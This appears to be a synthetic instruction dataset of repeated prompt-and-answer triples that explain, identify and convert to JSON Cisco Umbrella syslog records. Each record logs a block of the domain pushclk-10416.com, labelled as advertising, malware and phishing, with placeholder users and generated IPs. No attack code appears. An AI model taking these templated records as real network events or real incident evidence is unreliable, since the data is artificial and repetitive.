This is a syslog message from a product called Umbrella by Cisco. The following fields were extracted from the message: action: block fqdn: pushclk-10416.com messagetype: firewall_action productids: [38] senderhost: kafka.precinct sensitivity: normal serverhostname: pushclk-10416.com severitycode: 2 severitylabel: critical sourceinfo: unknown starttimeutc: 2023-05-18T20:29:12.000Z tags: ['OpenDNS Detection', 'firewall_action'] vendorcode: AdvertisementsMalwarePhishing streamName: OpenDNS Detection clientIP: 149.22.203.83 serverIP: 183.79.58.28 userName: fish
Explain this syslog message
WitFoo-Artifact ::: fqdn=pushclk-10416.com ::: action=BLOCKED ::: message={"originId":600808038,"originType":"Network Devices","internalIp":"197.90.56.12","externalIp":"31.147.64.180","categories":["Advertisements","Malware","Phishing"],"tags":[],"destination":"pushclk-10416.com","originLabel":"nighthawk","actionTaken":"BLOCKED","datetime":"2023-05-18T20:29:12.000Z"} ::: clientIP=197.90.56.12 ::: serverIP=31.147.64.180 ::: userName=nighthawk ::: created_at=2023-05-18T20:29:12.000Z ::: streamName=OpenDNS Detection ::: vendorCode=AdvertisementsMalwarePhishing ::: messageType=firewall_action ::: pipelineName=OpenDNS Detection ::: severityCode=2 ::: startTimeUTC=2023-05-18T20:29:12.000Z ::: serverHostname=pushclk-10416.com ::: pipelineEntrypoint=dispatch
{ "action": "block", "fqdn": "pushclk-10416.com", "message": "WitFoo-Artifact ::: fqdn=pushclk-10416.com ::: action=BLOCKED ::: message={\"originId\":600808038,\"originType\":\"Network Devices\",\"internalIp\":\"197.90.56.12\",\"externalIp\":\"31.147.64.180\",\"categories\":[\"Advertisements\",\"Malware\",\"Phishing\"],\"tags\":[],\"destination\":\"pushclk-10416.com\",\"originLabel\":\"nighthawk\",\"actionTaken\":\"BLOCKED\",\"datetime\":\"2023-05-18T20:29:12.000Z\"} ::: clientIP=197.90.56.12 ::: serverIP=31.147.64.180 ::: userName=nighthawk ::: created_at=2023-05-18T20:29:12.000Z ::: streamName=OpenDNS Detection ::: vendorCode=AdvertisementsMalwarePhishing ::: messageType=firewall_action ::: pipelineName=OpenDNS Detection ::: severityCode=2 ::: startTimeUTC=2023-05-18T20:29:12.000Z ::: serverHostname=pushclk-10416.com ::: pipelineEntrypoint=dispatch", "messagetype": "firewall_action", "productids": [ 38 ], "senderhost": "kafka.precinct", "sensitivity": "normal", "serverhostname": "pushclk-10416.com", "severitycode": 2, "severitylabel": "critical", "sourceinfo": "unknown", "starttimeutc": "2023-05-18T20:29:12.000Z", "tags": [ "OpenDNS Detection", "firewall_action" ], "vendorcode": "AdvertisementsMalwarePhishing", "streamName": "OpenDNS Detection", "clientIP": "197.90.56.12", "serverIP": "31.147.64.180", "userName": "nighthawk" }
Create a JSON artifact from the message
WitFoo-Artifact ::: fqdn=pushclk-10416.com ::: action=BLOCKED ::: message={"originId":600808038,"originType":"Network Devices","internalIp":"197.90.56.12","externalIp":"31.147.64.180","categories":["Advertisements","Malware","Phishing"],"tags":[],"destination":"pushclk-10416.com","originLabel":"nighthawk","actionTaken":"BLOCKED","datetime":"2023-05-18T20:29:12.000Z"} ::: clientIP=197.90.56.12 ::: serverIP=31.147.64.180 ::: userName=nighthawk ::: created_at=2023-05-18T20:29:12.000Z ::: streamName=OpenDNS Detection ::: vendorCode=AdvertisementsMalwarePhishing ::: messageType=firewall_action ::: pipelineName=OpenDNS Detection ::: severityCode=2 ::: startTimeUTC=2023-05-18T20:29:12.000Z ::: serverHostname=pushclk-10416.com ::: pipelineEntrypoint=dispatch
Product: Umbrella Vendor: Cisco
Identify this syslog message
WitFoo-Artifact ::: fqdn=pushclk-10416.com ::: action=BLOCKED ::: message={"originId":600808038,"originType":"Network Devices","internalIp":"197.90.56.12","externalIp":"31.147.64.180","categories":["Advertisements","Malware","Phishing"],"tags":[],"destination":"pushclk-10416.com","originLabel":"nighthawk","actionTaken":"BLOCKED","datetime":"2023-05-18T20:29:12.000Z"} ::: clientIP=197.90.56.12 ::: serverIP=31.147.64.180 ::: userName=nighthawk ::: created_at=2023-05-18T20:29:12.000Z ::: streamName=OpenDNS Detection ::: vendorCode=AdvertisementsMalwarePhishing ::: messageType=firewall_action ::: pipelineName=OpenDNS Detection ::: severityCode=2 ::: startTimeUTC=2023-05-18T20:29:12.000Z ::: serverHostname=pushclk-10416.com ::: pipelineEntrypoint=dispatch
This is a syslog message from a product called Umbrella by Cisco. The following fields were extracted from the message: action: block fqdn: pushclk-10416.com messagetype: firewall_action productids: [38] senderhost: kafka.precinct sensitivity: normal serverhostname: pushclk-10416.com severitycode: 2 severitylabel: critical sourceinfo: unknown starttimeutc: 2023-05-18T20:29:12.000Z tags: ['OpenDNS Detection', 'firewall_action'] vendorcode: AdvertisementsMalwarePhishing streamName: OpenDNS Detection clientIP: 197.90.56.12 serverIP: 31.147.64.180 userName: nighthawk
Explain this syslog message
WitFoo-Artifact ::: fqdn=pushclk-10416.com ::: action=BLOCKED ::: message={"originId":600808038,"originType":"Network Devices","internalIp":"244.216.172.63","externalIp":"241.136.89.108","categories":["Advertisements","Malware","Phishing"],"tags":[],"destination":"pushclk-10416.com","originLabel":"janedoe","actionTaken":"BLOCKED","datetime":"2023-05-17T14:43:12.000Z"} ::: clientIP=244.216.172.63 ::: serverIP=241.136.89.108 ::: userName=janedoe ::: created_at=2023-05-17T14:43:12.000Z ::: streamName=OpenDNS Detection ::: vendorCode=AdvertisementsMalwarePhishing ::: messageType=firewall_action ::: pipelineName=OpenDNS Detection ::: severityCode=2 ::: startTimeUTC=2023-05-17T14:43:12.000Z ::: serverHostname=pushclk-10416.com ::: pipelineEntrypoint=dispatch
{ "action": "block", "fqdn": "pushclk-10416.com", "message": "WitFoo-Artifact ::: fqdn=pushclk-10416.com ::: action=BLOCKED ::: message={\"originId\":600808038,\"originType\":\"Network Devices\",\"internalIp\":\"244.216.172.63\",\"externalIp\":\"241.136.89.108\",\"categories\":[\"Advertisements\",\"Malware\",\"Phishing\"],\"tags\":[],\"destination\":\"pushclk-10416.com\",\"originLabel\":\"janedoe\",\"actionTaken\":\"BLOCKED\",\"datetime\":\"2023-05-17T14:43:12.000Z\"} ::: clientIP=244.216.172.63 ::: serverIP=241.136.89.108 ::: userName=janedoe ::: created_at=2023-05-17T14:43:12.000Z ::: streamName=OpenDNS Detection ::: vendorCode=AdvertisementsMalwarePhishing ::: messageType=firewall_action ::: pipelineName=OpenDNS Detection ::: severityCode=2 ::: startTimeUTC=2023-05-17T14:43:12.000Z ::: serverHostname=pushclk-10416.com ::: pipelineEntrypoint=dispatch", "messagetype": "firewall_action", "productids": [ 38 ], "senderhost": "kafka.precinct", "sensitivity": "normal", "serverhostname": "pushclk-10416.com", "severitycode": 2, "severitylabel": "critical", "sourceinfo": "unknown", "starttimeutc": "2023-05-17T14:43:12.000Z", "tags": [ "OpenDNS Detection", "firewall_action" ], "vendorcode": "AdvertisementsMalwarePhishing", "streamName": "OpenDNS Detection", "clientIP": "244.216.172.63", "serverIP": "241.136.89.108", "userName": "janedoe" }
Create a JSON artifact from the message
WitFoo-Artifact ::: fqdn=pushclk-10416.com ::: action=BLOCKED ::: message={"originId":600808038,"originType":"Network Devices","internalIp":"244.216.172.63","externalIp":"241.136.89.108","categories":["Advertisements","Malware","Phishing"],"tags":[],"destination":"pushclk-10416.com","originLabel":"janedoe","actionTaken":"BLOCKED","datetime":"2023-05-17T14:43:12.000Z"} ::: clientIP=244.216.172.63 ::: serverIP=241.136.89.108 ::: userName=janedoe ::: created_at=2023-05-17T14:43:12.000Z ::: streamName=OpenDNS Detection ::: vendorCode=AdvertisementsMalwarePhishing ::: messageType=firewall_action ::: pipelineName=OpenDNS Detection ::: severityCode=2 ::: startTimeUTC=2023-05-17T14:43:12.000Z ::: serverHostname=pushclk-10416.com ::: pipelineEntrypoint=dispatch
Product: Umbrella Vendor: Cisco
Identify this syslog message
WitFoo-Artifact ::: fqdn=pushclk-10416.com ::: action=BLOCKED ::: message={"originId":600808038,"originType":"Network Devices","internalIp":"244.216.172.63","externalIp":"241.136.89.108","categories":["Advertisements","Malware","Phishing"],"tags":[],"destination":"pushclk-10416.com","originLabel":"janedoe","actionTaken":"BLOCKED","datetime":"2023-05-17T14:43:12.000Z"} ::: clientIP=244.216.172.63 ::: serverIP=241.136.89.108 ::: userName=janedoe ::: created_at=2023-05-17T14:43:12.000Z ::: streamName=OpenDNS Detection ::: vendorCode=AdvertisementsMalwarePhishing ::: messageType=firewall_action ::: pipelineName=OpenDNS Detection ::: severityCode=2 ::: startTimeUTC=2023-05-17T14:43:12.000Z ::: serverHostname=pushclk-10416.com ::: pipelineEntrypoint=dispatch
This is a syslog message from a product called Umbrella by Cisco. The following fields were extracted from the message: action: block fqdn: pushclk-10416.com messagetype: firewall_action productids: [38] senderhost: kafka.precinct sensitivity: normal serverhostname: pushclk-10416.com severitycode: 2 severitylabel: critical sourceinfo: unknown starttimeutc: 2023-05-17T14:43:12.000Z tags: ['OpenDNS Detection', 'firewall_action'] vendorcode: AdvertisementsMalwarePhishing streamName: OpenDNS Detection clientIP: 244.216.172.63 serverIP: 241.136.89.108 userName: janedoe
Explain this syslog message
WitFoo-Artifact ::: fqdn=pushclk-10416.com ::: action=BLOCKED ::: message={"originId":600808038,"originType":"Network Devices","internalIp":"177.15.242.46","externalIp":"77.4.39.181","categories":["Advertisements","Malware","Phishing"],"tags":[],"destination":"pushclk-10416.com","originLabel":"janedoe","actionTaken":"BLOCKED","datetime":"2023-05-17T14:43:12.000Z"} ::: clientIP=177.15.242.46 ::: serverIP=77.4.39.181 ::: userName=janedoe ::: created_at=2023-05-17T14:43:12.000Z ::: streamName=OpenDNS Detection ::: vendorCode=AdvertisementsMalwarePhishing ::: messageType=firewall_action ::: pipelineName=OpenDNS Detection ::: severityCode=2 ::: startTimeUTC=2023-05-17T14:43:12.000Z ::: serverHostname=pushclk-10416.com ::: pipelineEntrypoint=dispatch
{ "action": "block", "fqdn": "pushclk-10416.com", "message": "WitFoo-Artifact ::: fqdn=pushclk-10416.com ::: action=BLOCKED ::: message={\"originId\":600808038,\"originType\":\"Network Devices\",\"internalIp\":\"177.15.242.46\",\"externalIp\":\"77.4.39.181\",\"categories\":[\"Advertisements\",\"Malware\",\"Phishing\"],\"tags\":[],\"destination\":\"pushclk-10416.com\",\"originLabel\":\"janedoe\",\"actionTaken\":\"BLOCKED\",\"datetime\":\"2023-05-17T14:43:12.000Z\"} ::: clientIP=177.15.242.46 ::: serverIP=77.4.39.181 ::: userName=janedoe ::: created_at=2023-05-17T14:43:12.000Z ::: streamName=OpenDNS Detection ::: vendorCode=AdvertisementsMalwarePhishing ::: messageType=firewall_action ::: pipelineName=OpenDNS Detection ::: severityCode=2 ::: startTimeUTC=2023-05-17T14:43:12.000Z ::: serverHostname=pushclk-10416.com ::: pipelineEntrypoint=dispatch", "messagetype": "firewall_action", "productids": [ 38 ], "senderhost": "kafka.precinct", "sensitivity": "normal", "serverhostname": "pushclk-10416.com", "severitycode": 2, "severitylabel": "critical", "sourceinfo": "unknown", "starttimeutc": "2023-05-17T14:43:12.000Z", "tags": [ "OpenDNS Detection", "firewall_action" ], "vendorcode": "AdvertisementsMalwarePhishing", "streamName": "OpenDNS Detection", "clientIP": "177.15.242.46", "serverIP": "77.4.39.181", "userName": "janedoe" }
Create a JSON artifact from the message
WitFoo-Artifact ::: fqdn=pushclk-10416.com ::: action=BLOCKED ::: message={"originId":600808038,"originType":"Network Devices","internalIp":"177.15.242.46","externalIp":"77.4.39.181","categories":["Advertisements","Malware","Phishing"],"tags":[],"destination":"pushclk-10416.com","originLabel":"janedoe","actionTaken":"BLOCKED","datetime":"2023-05-17T14:43:12.000Z"} ::: clientIP=177.15.242.46 ::: serverIP=77.4.39.181 ::: userName=janedoe ::: created_at=2023-05-17T14:43:12.000Z ::: streamName=OpenDNS Detection ::: vendorCode=AdvertisementsMalwarePhishing ::: messageType=firewall_action ::: pipelineName=OpenDNS Detection ::: severityCode=2 ::: startTimeUTC=2023-05-17T14:43:12.000Z ::: serverHostname=pushclk-10416.com ::: pipelineEntrypoint=dispatch
Product: Umbrella Vendor: Cisco
Identify this syslog message
WitFoo-Artifact ::: fqdn=pushclk-10416.com ::: action=BLOCKED ::: message={"originId":600808038,"originType":"Network Devices","internalIp":"177.15.242.46","externalIp":"77.4.39.181","categories":["Advertisements","Malware","Phishing"],"tags":[],"destination":"pushclk-10416.com","originLabel":"janedoe","actionTaken":"BLOCKED","datetime":"2023-05-17T14:43:12.000Z"} ::: clientIP=177.15.242.46 ::: serverIP=77.4.39.181 ::: userName=janedoe ::: created_at=2023-05-17T14:43:12.000Z ::: streamName=OpenDNS Detection ::: vendorCode=AdvertisementsMalwarePhishing ::: messageType=firewall_action ::: pipelineName=OpenDNS Detection ::: severityCode=2 ::: startTimeUTC=2023-05-17T14:43:12.000Z ::: serverHostname=pushclk-10416.com ::: pipelineEntrypoint=dispatch
This is a syslog message from a product called Umbrella by Cisco. The following fields were extracted from the message: action: block fqdn: pushclk-10416.com messagetype: firewall_action productids: [38] senderhost: kafka.precinct sensitivity: normal serverhostname: pushclk-10416.com severitycode: 2 severitylabel: critical sourceinfo: unknown starttimeutc: 2023-05-17T14:43:12.000Z tags: ['OpenDNS Detection', 'firewall_action'] vendorcode: AdvertisementsMalwarePhishing streamName: OpenDNS Detection clientIP: 177.15.242.46 serverIP: 77.4.39.181 userName: janedoe
Explain this syslog message
WitFoo-Artifact ::: fqdn=pushclk-10416.com ::: action=BLOCKED ::: message={"originId":600808038,"originType":"Network Devices","internalIp":"141.58.88.113","externalIp":"220.173.141.211","categories":["Advertisements","Malware","Phishing"],"tags":[],"destination":"pushclk-10416.com","originLabel":"janedoe","actionTaken":"BLOCKED","datetime":"2023-05-18T16:28:22.000Z"} ::: clientIP=141.58.88.113 ::: serverIP=220.173.141.211 ::: userName=janedoe ::: created_at=2023-05-18T16:28:22.000Z ::: streamName=OpenDNS Detection ::: vendorCode=AdvertisementsMalwarePhishing ::: messageType=firewall_action ::: pipelineName=OpenDNS Detection ::: severityCode=2 ::: startTimeUTC=2023-05-18T16:28:22.000Z ::: serverHostname=pushclk-10416.com ::: pipelineEntrypoint=dispatch
{ "action": "block", "fqdn": "pushclk-10416.com", "message": "WitFoo-Artifact ::: fqdn=pushclk-10416.com ::: action=BLOCKED ::: message={\"originId\":600808038,\"originType\":\"Network Devices\",\"internalIp\":\"141.58.88.113\",\"externalIp\":\"220.173.141.211\",\"categories\":[\"Advertisements\",\"Malware\",\"Phishing\"],\"tags\":[],\"destination\":\"pushclk-10416.com\",\"originLabel\":\"janedoe\",\"actionTaken\":\"BLOCKED\",\"datetime\":\"2023-05-18T16:28:22.000Z\"} ::: clientIP=141.58.88.113 ::: serverIP=220.173.141.211 ::: userName=janedoe ::: created_at=2023-05-18T16:28:22.000Z ::: streamName=OpenDNS Detection ::: vendorCode=AdvertisementsMalwarePhishing ::: messageType=firewall_action ::: pipelineName=OpenDNS Detection ::: severityCode=2 ::: startTimeUTC=2023-05-18T16:28:22.000Z ::: serverHostname=pushclk-10416.com ::: pipelineEntrypoint=dispatch", "messagetype": "firewall_action", "productids": [ 38 ], "senderhost": "kafka.precinct", "sensitivity": "normal", "serverhostname": "pushclk-10416.com", "severitycode": 2, "severitylabel": "critical", "sourceinfo": "unknown", "starttimeutc": "2023-05-18T16:28:22.000Z", "tags": [ "OpenDNS Detection", "firewall_action" ], "vendorcode": "AdvertisementsMalwarePhishing", "streamName": "OpenDNS Detection", "clientIP": "141.58.88.113", "serverIP": "220.173.141.211", "userName": "janedoe" }
Create a JSON artifact from the message
WitFoo-Artifact ::: fqdn=pushclk-10416.com ::: action=BLOCKED ::: message={"originId":600808038,"originType":"Network Devices","internalIp":"141.58.88.113","externalIp":"220.173.141.211","categories":["Advertisements","Malware","Phishing"],"tags":[],"destination":"pushclk-10416.com","originLabel":"janedoe","actionTaken":"BLOCKED","datetime":"2023-05-18T16:28:22.000Z"} ::: clientIP=141.58.88.113 ::: serverIP=220.173.141.211 ::: userName=janedoe ::: created_at=2023-05-18T16:28:22.000Z ::: streamName=OpenDNS Detection ::: vendorCode=AdvertisementsMalwarePhishing ::: messageType=firewall_action ::: pipelineName=OpenDNS Detection ::: severityCode=2 ::: startTimeUTC=2023-05-18T16:28:22.000Z ::: serverHostname=pushclk-10416.com ::: pipelineEntrypoint=dispatch
Product: Umbrella Vendor: Cisco
Identify this syslog message
WitFoo-Artifact ::: fqdn=pushclk-10416.com ::: action=BLOCKED ::: message={"originId":600808038,"originType":"Network Devices","internalIp":"141.58.88.113","externalIp":"220.173.141.211","categories":["Advertisements","Malware","Phishing"],"tags":[],"destination":"pushclk-10416.com","originLabel":"janedoe","actionTaken":"BLOCKED","datetime":"2023-05-18T16:28:22.000Z"} ::: clientIP=141.58.88.113 ::: serverIP=220.173.141.211 ::: userName=janedoe ::: created_at=2023-05-18T16:28:22.000Z ::: streamName=OpenDNS Detection ::: vendorCode=AdvertisementsMalwarePhishing ::: messageType=firewall_action ::: pipelineName=OpenDNS Detection ::: severityCode=2 ::: startTimeUTC=2023-05-18T16:28:22.000Z ::: serverHostname=pushclk-10416.com ::: pipelineEntrypoint=dispatch
This is a syslog message from a product called Umbrella by Cisco. The following fields were extracted from the message: action: block fqdn: pushclk-10416.com messagetype: firewall_action productids: [38] senderhost: kafka.precinct sensitivity: normal serverhostname: pushclk-10416.com severitycode: 2 severitylabel: critical sourceinfo: unknown starttimeutc: 2023-05-18T16:28:22.000Z tags: ['OpenDNS Detection', 'firewall_action'] vendorcode: AdvertisementsMalwarePhishing streamName: OpenDNS Detection clientIP: 141.58.88.113 serverIP: 220.173.141.211 userName: janedoe
Explain this syslog message
WitFoo-Artifact ::: fqdn=pushclk-10416.com ::: action=BLOCKED ::: message={"originId":600808038,"originType":"Network Devices","internalIp":"210.100.146.99","externalIp":"37.107.48.148","categories":["Advertisements","Malware","Phishing"],"tags":[],"destination":"pushclk-10416.com","originLabel":"alice","actionTaken":"BLOCKED","datetime":"2023-05-18T16:28:22.000Z"} ::: clientIP=210.100.146.99 ::: serverIP=37.107.48.148 ::: userName=alice ::: created_at=2023-05-18T16:28:22.000Z ::: streamName=OpenDNS Detection ::: vendorCode=AdvertisementsMalwarePhishing ::: messageType=firewall_action ::: pipelineName=OpenDNS Detection ::: severityCode=2 ::: startTimeUTC=2023-05-18T16:28:22.000Z ::: serverHostname=pushclk-10416.com ::: pipelineEntrypoint=dispatch
{ "action": "block", "fqdn": "pushclk-10416.com", "message": "WitFoo-Artifact ::: fqdn=pushclk-10416.com ::: action=BLOCKED ::: message={\"originId\":600808038,\"originType\":\"Network Devices\",\"internalIp\":\"210.100.146.99\",\"externalIp\":\"37.107.48.148\",\"categories\":[\"Advertisements\",\"Malware\",\"Phishing\"],\"tags\":[],\"destination\":\"pushclk-10416.com\",\"originLabel\":\"alice\",\"actionTaken\":\"BLOCKED\",\"datetime\":\"2023-05-18T16:28:22.000Z\"} ::: clientIP=210.100.146.99 ::: serverIP=37.107.48.148 ::: userName=alice ::: created_at=2023-05-18T16:28:22.000Z ::: streamName=OpenDNS Detection ::: vendorCode=AdvertisementsMalwarePhishing ::: messageType=firewall_action ::: pipelineName=OpenDNS Detection ::: severityCode=2 ::: startTimeUTC=2023-05-18T16:28:22.000Z ::: serverHostname=pushclk-10416.com ::: pipelineEntrypoint=dispatch", "messagetype": "firewall_action", "productids": [ 38 ], "senderhost": "kafka.precinct", "sensitivity": "normal", "serverhostname": "pushclk-10416.com", "severitycode": 2, "severitylabel": "critical", "sourceinfo": "unknown", "starttimeutc": "2023-05-18T16:28:22.000Z", "tags": [ "OpenDNS Detection", "firewall_action" ], "vendorcode": "AdvertisementsMalwarePhishing", "streamName": "OpenDNS Detection", "clientIP": "210.100.146.99", "serverIP": "37.107.48.148", "userName": "alice" }
Create a JSON artifact from the message
WitFoo-Artifact ::: fqdn=pushclk-10416.com ::: action=BLOCKED ::: message={"originId":600808038,"originType":"Network Devices","internalIp":"210.100.146.99","externalIp":"37.107.48.148","categories":["Advertisements","Malware","Phishing"],"tags":[],"destination":"pushclk-10416.com","originLabel":"alice","actionTaken":"BLOCKED","datetime":"2023-05-18T16:28:22.000Z"} ::: clientIP=210.100.146.99 ::: serverIP=37.107.48.148 ::: userName=alice ::: created_at=2023-05-18T16:28:22.000Z ::: streamName=OpenDNS Detection ::: vendorCode=AdvertisementsMalwarePhishing ::: messageType=firewall_action ::: pipelineName=OpenDNS Detection ::: severityCode=2 ::: startTimeUTC=2023-05-18T16:28:22.000Z ::: serverHostname=pushclk-10416.com ::: pipelineEntrypoint=dispatch
Product: Umbrella Vendor: Cisco
Identify this syslog message
WitFoo-Artifact ::: fqdn=pushclk-10416.com ::: action=BLOCKED ::: message={"originId":600808038,"originType":"Network Devices","internalIp":"210.100.146.99","externalIp":"37.107.48.148","categories":["Advertisements","Malware","Phishing"],"tags":[],"destination":"pushclk-10416.com","originLabel":"alice","actionTaken":"BLOCKED","datetime":"2023-05-18T16:28:22.000Z"} ::: clientIP=210.100.146.99 ::: serverIP=37.107.48.148 ::: userName=alice ::: created_at=2023-05-18T16:28:22.000Z ::: streamName=OpenDNS Detection ::: vendorCode=AdvertisementsMalwarePhishing ::: messageType=firewall_action ::: pipelineName=OpenDNS Detection ::: severityCode=2 ::: startTimeUTC=2023-05-18T16:28:22.000Z ::: serverHostname=pushclk-10416.com ::: pipelineEntrypoint=dispatch
This is a syslog message from a product called Umbrella by Cisco. The following fields were extracted from the message: action: block fqdn: pushclk-10416.com messagetype: firewall_action productids: [38] senderhost: kafka.precinct sensitivity: normal serverhostname: pushclk-10416.com severitycode: 2 severitylabel: critical sourceinfo: unknown starttimeutc: 2023-05-18T16:28:22.000Z tags: ['OpenDNS Detection', 'firewall_action'] vendorcode: AdvertisementsMalwarePhishing streamName: OpenDNS Detection clientIP: 210.100.146.99 serverIP: 37.107.48.148 userName: alice
Explain this syslog message
WitFoo-Artifact ::: fqdn=pushclk-10416.com ::: action=BLOCKED ::: message={"originId":600808038,"originType":"Network Devices","internalIp":"152.220.28.204","externalIp":"145.196.89.123","categories":["Advertisements","Malware","Phishing"],"tags":[],"destination":"pushclk-10416.com","originLabel":"bob","actionTaken":"BLOCKED","datetime":"2023-05-18T20:29:12.000Z"} ::: clientIP=152.220.28.204 ::: serverIP=145.196.89.123 ::: userName=bob ::: created_at=2023-05-18T20:29:12.000Z ::: streamName=OpenDNS Detection ::: vendorCode=AdvertisementsMalwarePhishing ::: messageType=firewall_action ::: pipelineName=OpenDNS Detection ::: severityCode=2 ::: startTimeUTC=2023-05-18T20:29:12.000Z ::: serverHostname=pushclk-10416.com ::: pipelineEntrypoint=dispatch
{ "action": "block", "fqdn": "pushclk-10416.com", "message": "WitFoo-Artifact ::: fqdn=pushclk-10416.com ::: action=BLOCKED ::: message={\"originId\":600808038,\"originType\":\"Network Devices\",\"internalIp\":\"152.220.28.204\",\"externalIp\":\"145.196.89.123\",\"categories\":[\"Advertisements\",\"Malware\",\"Phishing\"],\"tags\":[],\"destination\":\"pushclk-10416.com\",\"originLabel\":\"bob\",\"actionTaken\":\"BLOCKED\",\"datetime\":\"2023-05-18T20:29:12.000Z\"} ::: clientIP=152.220.28.204 ::: serverIP=145.196.89.123 ::: userName=bob ::: created_at=2023-05-18T20:29:12.000Z ::: streamName=OpenDNS Detection ::: vendorCode=AdvertisementsMalwarePhishing ::: messageType=firewall_action ::: pipelineName=OpenDNS Detection ::: severityCode=2 ::: startTimeUTC=2023-05-18T20:29:12.000Z ::: serverHostname=pushclk-10416.com ::: pipelineEntrypoint=dispatch", "messagetype": "firewall_action", "productids": [ 38 ], "senderhost": "kafka.precinct", "sensitivity": "normal", "serverhostname": "pushclk-10416.com", "severitycode": 2, "severitylabel": "critical", "sourceinfo": "unknown", "starttimeutc": "2023-05-18T20:29:12.000Z", "tags": [ "OpenDNS Detection", "firewall_action" ], "vendorcode": "AdvertisementsMalwarePhishing", "streamName": "OpenDNS Detection", "clientIP": "152.220.28.204", "serverIP": "145.196.89.123", "userName": "bob" }
Create a JSON artifact from the message
WitFoo-Artifact ::: fqdn=pushclk-10416.com ::: action=BLOCKED ::: message={"originId":600808038,"originType":"Network Devices","internalIp":"152.220.28.204","externalIp":"145.196.89.123","categories":["Advertisements","Malware","Phishing"],"tags":[],"destination":"pushclk-10416.com","originLabel":"bob","actionTaken":"BLOCKED","datetime":"2023-05-18T20:29:12.000Z"} ::: clientIP=152.220.28.204 ::: serverIP=145.196.89.123 ::: userName=bob ::: created_at=2023-05-18T20:29:12.000Z ::: streamName=OpenDNS Detection ::: vendorCode=AdvertisementsMalwarePhishing ::: messageType=firewall_action ::: pipelineName=OpenDNS Detection ::: severityCode=2 ::: startTimeUTC=2023-05-18T20:29:12.000Z ::: serverHostname=pushclk-10416.com ::: pipelineEntrypoint=dispatch
Product: Umbrella Vendor: Cisco
Identify this syslog message
WitFoo-Artifact ::: fqdn=pushclk-10416.com ::: action=BLOCKED ::: message={"originId":600808038,"originType":"Network Devices","internalIp":"152.220.28.204","externalIp":"145.196.89.123","categories":["Advertisements","Malware","Phishing"],"tags":[],"destination":"pushclk-10416.com","originLabel":"bob","actionTaken":"BLOCKED","datetime":"2023-05-18T20:29:12.000Z"} ::: clientIP=152.220.28.204 ::: serverIP=145.196.89.123 ::: userName=bob ::: created_at=2023-05-18T20:29:12.000Z ::: streamName=OpenDNS Detection ::: vendorCode=AdvertisementsMalwarePhishing ::: messageType=firewall_action ::: pipelineName=OpenDNS Detection ::: severityCode=2 ::: startTimeUTC=2023-05-18T20:29:12.000Z ::: serverHostname=pushclk-10416.com ::: pipelineEntrypoint=dispatch
This is a syslog message from a product called Umbrella by Cisco. The following fields were extracted from the message: action: block fqdn: pushclk-10416.com messagetype: firewall_action productids: [38] senderhost: kafka.precinct sensitivity: normal serverhostname: pushclk-10416.com severitycode: 2 severitylabel: critical sourceinfo: unknown starttimeutc: 2023-05-18T20:29:12.000Z tags: ['OpenDNS Detection', 'firewall_action'] vendorcode: AdvertisementsMalwarePhishing streamName: OpenDNS Detection clientIP: 152.220.28.204 serverIP: 145.196.89.123 userName: bob
Explain this syslog message
WitFoo-Artifact ::: fqdn=pushclk-10416.com ::: action=BLOCKED ::: message={"originId":600808038,"originType":"Network Devices","internalIp":"176.7.198.1","externalIp":"28.145.115.161","categories":["Advertisements","Malware","Phishing"],"tags":[],"destination":"pushclk-10416.com","originLabel":"bob","actionTaken":"BLOCKED","datetime":"2023-05-18T20:29:12.000Z"} ::: clientIP=176.7.198.1 ::: serverIP=28.145.115.161 ::: userName=bob ::: created_at=2023-05-18T20:29:12.000Z ::: streamName=OpenDNS Detection ::: vendorCode=AdvertisementsMalwarePhishing ::: messageType=firewall_action ::: pipelineName=OpenDNS Detection ::: severityCode=2 ::: startTimeUTC=2023-05-18T20:29:12.000Z ::: serverHostname=pushclk-10416.com ::: pipelineEntrypoint=dispatch
{ "action": "block", "fqdn": "pushclk-10416.com", "message": "WitFoo-Artifact ::: fqdn=pushclk-10416.com ::: action=BLOCKED ::: message={\"originId\":600808038,\"originType\":\"Network Devices\",\"internalIp\":\"176.7.198.1\",\"externalIp\":\"28.145.115.161\",\"categories\":[\"Advertisements\",\"Malware\",\"Phishing\"],\"tags\":[],\"destination\":\"pushclk-10416.com\",\"originLabel\":\"bob\",\"actionTaken\":\"BLOCKED\",\"datetime\":\"2023-05-18T20:29:12.000Z\"} ::: clientIP=176.7.198.1 ::: serverIP=28.145.115.161 ::: userName=bob ::: created_at=2023-05-18T20:29:12.000Z ::: streamName=OpenDNS Detection ::: vendorCode=AdvertisementsMalwarePhishing ::: messageType=firewall_action ::: pipelineName=OpenDNS Detection ::: severityCode=2 ::: startTimeUTC=2023-05-18T20:29:12.000Z ::: serverHostname=pushclk-10416.com ::: pipelineEntrypoint=dispatch", "messagetype": "firewall_action", "productids": [ 38 ], "senderhost": "kafka.precinct", "sensitivity": "normal", "serverhostname": "pushclk-10416.com", "severitycode": 2, "severitylabel": "critical", "sourceinfo": "unknown", "starttimeutc": "2023-05-18T20:29:12.000Z", "tags": [ "OpenDNS Detection", "firewall_action" ], "vendorcode": "AdvertisementsMalwarePhishing", "streamName": "OpenDNS Detection", "clientIP": "176.7.198.1", "serverIP": "28.145.115.161", "userName": "bob" }
Create a JSON artifact from the message
WitFoo-Artifact ::: fqdn=pushclk-10416.com ::: action=BLOCKED ::: message={"originId":600808038,"originType":"Network Devices","internalIp":"176.7.198.1","externalIp":"28.145.115.161","categories":["Advertisements","Malware","Phishing"],"tags":[],"destination":"pushclk-10416.com","originLabel":"bob","actionTaken":"BLOCKED","datetime":"2023-05-18T20:29:12.000Z"} ::: clientIP=176.7.198.1 ::: serverIP=28.145.115.161 ::: userName=bob ::: created_at=2023-05-18T20:29:12.000Z ::: streamName=OpenDNS Detection ::: vendorCode=AdvertisementsMalwarePhishing ::: messageType=firewall_action ::: pipelineName=OpenDNS Detection ::: severityCode=2 ::: startTimeUTC=2023-05-18T20:29:12.000Z ::: serverHostname=pushclk-10416.com ::: pipelineEntrypoint=dispatch
Product: Umbrella Vendor: Cisco
Identify this syslog message
